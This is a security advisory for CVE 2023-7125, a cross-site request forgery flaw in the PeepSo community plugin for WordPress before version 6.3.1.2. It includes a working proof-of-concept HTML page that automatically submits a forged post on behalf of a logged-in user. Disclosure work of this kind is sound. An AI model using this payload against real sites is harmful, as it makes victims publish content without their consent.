Community by PeepSo < 6.3.1.2 – User Post Creation via CSRF | CVE 2023-7125

Description

The plugin does not have CSRF check when creating a user post (visible on their wall in their profile page), which could allow attackers to make logged in users perform such action via a CSRF attack

Proof of Concept

1. Log in as a normal user.
2. Save the content below as an HTML file.

<html>
  <body>
    <form action="https://example.com/peepsoajax/postbox.post" method="POST">
      <input type="hidden" name="content" value="testing by bikram&#10;" />
      <input type="hidden" name="id" value="2" />
      <input type="hidden" name="uid" value="2" />
      <input type="hidden" name="acc" value="10" />
      <input type="hidden" name="type" value="activity" />
      <input type="hidden" name="mood" value="0" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      history.pushState('', '', '/');
      document.forms[0].submit();
    </script>
  </body>
</html>

3. Change the ID and UID value to your account ID.
4. Open the above HTML file and submit it. A new post will be created and can be seen in the profile page (default /profile/)